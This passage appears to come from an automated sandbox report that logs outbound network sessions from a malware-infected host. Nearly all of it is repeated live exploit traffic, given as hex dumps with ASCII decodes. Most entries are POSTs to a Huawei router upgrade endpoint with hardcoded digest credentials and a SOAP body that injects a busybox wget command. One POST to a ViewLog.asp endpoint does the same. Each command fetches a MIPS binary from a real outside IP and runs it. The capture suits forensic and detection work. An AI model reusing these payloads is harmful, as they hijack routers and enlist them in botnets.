                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              608192.168.2.1450106156.241.8.2737215
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:17:57.691468954 CET874OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Content-Length: 430
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 37 34 2e 35 30 2e 38 34 2e 32 30 33 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 77 65 62 6f 73 2f 77 68 6f 61 72 65 79 6f 75 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 74.50.84.203 -l /tmp/kh -r /webos/whoareyou.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                              Nov 23, 2023 05:18:01.857542992 CET874OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Content-Length: 430
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 37 34 2e 35 30 2e 38 34 2e 32 30 33 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 77 65 62 6f 73 2f 77 68 6f 61 72 65 79 6f 75 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 74.50.84.203 -l /tmp/kh -r /webos/whoareyou.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                              Nov 23, 2023 05:18:08.001313925 CET874OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Content-Length: 430
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 37 34 2e 35 30 2e 38 34 2e 32 30 33 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 77 65 62 6f 73 2f 77 68 6f 61 72 65 79 6f 75 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 74.50.84.203 -l /tmp/kh -r /webos/whoareyou.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                              Nov 23, 2023 05:18:20.032792091 CET874OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Content-Length: 430
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 37 34 2e 35 30 2e 38 34 2e 32 30 33 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 77 65 62 6f 73 2f 77 68 6f 61 72 65 79 6f 75 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 74.50.84.203 -l /tmp/kh -r /webos/whoareyou.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              609192.168.2.145089294.122.95.988080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:17:58.273865938 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              610192.168.2.1439356156.254.79.12237215
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:17:58.567580938 CET874OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Content-Length: 430
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 37 34 2e 35 30 2e 38 34 2e 32 30 33 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 77 65 62 6f 73 2f 77 68 6f 61 72 65 79 6f 75 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 74.50.84.203 -l /tmp/kh -r /webos/whoareyou.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                              Nov 23, 2023 05:18:00.225599051 CET874OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Content-Length: 430
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 37 34 2e 35 30 2e 38 34 2e 32 30 33 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 77 65 62 6f 73 2f 77 68 6f 61 72 65 79 6f 75 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 74.50.84.203 -l /tmp/kh -r /webos/whoareyou.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                              Nov 23, 2023 05:18:02.177515030 CET874OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Content-Length: 430
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 37 34 2e 35 30 2e 38 34 2e 32 30 33 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 77 65 62 6f 73 2f 77 68 6f 61 72 65 79 6f 75 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 74.50.84.203 -l /tmp/kh -r /webos/whoareyou.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                              Nov 23, 2023 05:18:06.209465027 CET874OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Content-Length: 430
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 37 34 2e 35 30 2e 38 34 2e 32 30 33 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 77 65 62 6f 73 2f 77 68 6f 61 72 65 79 6f 75 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 74.50.84.203 -l /tmp/kh -r /webos/whoareyou.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                              Nov 23, 2023 05:18:14.145064116 CET874OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Content-Length: 430
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
